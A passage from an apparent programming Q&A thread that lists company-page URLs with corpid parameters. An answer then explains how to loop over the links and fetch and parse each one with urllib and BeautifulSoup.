'expCompany.aspx?corpid=0858556012',
'expCompany.aspx?corpid=0883227862',
'expCompany.aspx?corpid=0802151577',
'expCompany.aspx?corpid=0725403915',
'expCompany.aspx?corpid=0773118307',
'expCompany.aspx?corpid=0977967839',
'expCompany.aspx?corpid=0889257398',
'expCompany.aspx?corpid=0773003774',
'expCompany.aspx?corpid=0741211862'],
['expCompany.aspx?corpid=0944767300',
'expCompany.aspx?corpid=0766703225',
'expCompany.aspx?corpid=0807623222',
'expCompany.aspx?corpid=0754416485',
'expCompany.aspx?corpid=0716414765',
'expCompany.aspx?corpid=0764603066',
'expCompany.aspx?corpid=0757110589',
'expCompany.aspx?corpid=0800248632',
'expCompany.aspx?corpid=0747902779',
'expCompany.aspx?corpid=0738619647'],
['expCompany.aspx?corpid=1098582416',
'expCompany.aspx?corpid=0909669961',
'expCompany.aspx?corpid=0862829627',
'expCompany.aspx?corpid=0892328884',
'expCompany.aspx?corpid=0886729635',
'expCompany.aspx?corpid=0724805261',
'expCompany.aspx?corpid=0877655294',
'expCompany.aspx?corpid=0835853958',
'expCompany.aspx?corpid=0737821957',
'expCompany.aspx?corpid=0785019255'],
['expCompany.aspx?corpid=0873828585',
'expCompany.aspx?corpid=0735401884',
'expCompany.aspx?corpid=0927058069',
'expCompany.aspx?corpid=0794816876',
'expCompany.aspx?corpid=0721211392',
'expCompany.aspx?corpid=0741602341',
'expCompany.aspx?corpid=0760906105',
'expCompany.aspx?corpid=0904473659',
'expCompany.aspx?corpid=0711614568',
'expCompany.aspx?corpid=0753503530'],
['expCompany.aspx?corpid=0774108002',
'expCompany.aspx?corpid=0845328722',
'expCompany.aspx?corpid=0823848403',
'expCompany.aspx?corpid=0876029511',
'expCompany.aspx?corpid=0886827914',
'expCompany.aspx?corpid=0712712280',
'expCompany.aspx?corpid=0833854881',
'expCompany.aspx?corpid=0746216867',
'expCompany.aspx?corpid=0774704214',
'expCompany.aspx?corpid=0730516488'],
['expCompany.aspx?corpid=0716607064',
'expCompany.aspx?corpid=0758917403',
'expCompany.aspx?corpid=0763702256',
'expCompany.aspx?corpid=0721303394',
'expCompany.aspx?corpid=0828647452',
'expCompany.aspx?corpid=0771805641',
'expCompany.aspx?corpid=0741722489',
'expCompany.aspx?corpid=0980867582',
'expCompany.aspx?corpid=0790809611',
'expCompany.aspx?corpid=0714917484'],
['expCompany.aspx?corpid=0790402155',
'expCompany.aspx?corpid=0710118558',
'expCompany.aspx?corpid=0864455955',
'expCompany.aspx?corpid=0784706276',
'expCompany.aspx?corpid=0897623416',
'expCompany.aspx?corpid=0821453137',
'expCompany.aspx?corpid=0754917280',
'expCompany.aspx?corpid=0724600646',
'expCompany.aspx?corpid=0764211415',
'expCompany.aspx?corpid=0735008307'],
['expCompany.aspx?corpid=0795909343',
'expCompany.aspx?corpid=0850830043',
'expCompany.aspx?corpid=0970778277',
'expCompany.aspx?corpid=1075781404',
'expCompany.aspx?corpid=1252802513',
'expCompany.aspx?corpid=1236901616',
'expCompany.aspx?corpid=1435215908',
'expCompany.aspx?corpid=1469712283',
'expCompany.aspx?corpid=1439615100',
'expCompany.aspx?corpid=1245501009'],
['expCompany.aspx?corpid=0901974362',
'expCompany.aspx?corpid=1487117816',
'expCompany.aspx?corpid=1058881186',
'expCompany.aspx?corpid=0809557305',
'expCompany.aspx?corpid=1265998039',
'expCompany.aspx?corpid=1188093431',
'expCompany.aspx?corpid=0995572026',
'expCompany.aspx?corpid=1036184837',
'expCompany.aspx?corpid=0990573086',
'expCompany.aspx?corpid=1464212531'],
['expCompany.aspx?corpid=0858351382',
'expCompany.aspx?corpid=1348806571',
'expCompany.aspx?corpid=0822452086',
'expCompany.aspx?corpid=1428413902',
'expCompany.aspx?corpid=0879752062',
'expCompany.aspx?corpid=1369405760',
'expCompany.aspx?corpid=1256000612',
'expCompany.aspx?corpid=1037680042',
'expCompany.aspx?corpid=1062381570',
'expCompany.aspx?corpid=1461915811'],
['expCompany.aspx?corpid=1373808159',
'expCompany.aspx?corpid=1027382040',
'expCompany.aspx?corpid=1191393458',
'expCompany.aspx?corpid=1133389590',
'expCompany.aspx?corpid=0762910036',
'expCompany.aspx?corpid=1399206654',
'expCompany.aspx?corpid=1253598637',
'expCompany.aspx?corpid=1128889405',
'expCompany.aspx?corpid=1082384190',
'expCompany.aspx?corpid=1077881359'],
['expCompany.aspx?corpid=1584325065',
'expCompany.aspx?corpid=1131692156',
'expCompany.aspx?corpid=1587322969',
'expCompany.aspx?corpid=1251100353',
'expCompany.aspx?corpid=1115590386',
'expCompany.aspx?corpid=1541424572',
'expCompany.aspx?corpid=1137393378',
'expCompany.aspx?corpid=1069988131',
'expCompany.aspx?corpid=1392806069',
'expCompany.aspx?corpid=0766210029'],
['expCompany.aspx?corpid=1143394259',
'expCompany.aspx?corpid=1561819111',
'expCompany.aspx?corpid=1349307520']]
str1 in your case contains a list of URLs. You are joining this list of URLs into a single string separated by newlines and then trying to navigate to that mix, which of course does not work.
Instead, you meant to loop over the extracted URLs one by one and navigate to each:
linksfromcategories = [string + x for x in linksfromcategories]

for link in linksfromcategories:
    print(link)
    lfc = urllib.request.urlopen(link).read()
    soup2 = BeautifulSoup(lfc, "html.parser")
    print(soup2)
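If the parsed pages need to be kept for further processing rather than just printed, a small variation (a sketch reusing the question's imports and the linksfromcategories list built above) collects them into a list:

category_soups = []
for link in linksfromcategories:
    lfc = urllib.request.urlopen(link).read()
    category_soups.append(BeautifulSoup(lfc, "html.parser"))
print(len(category_soups), "category pages parsed")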
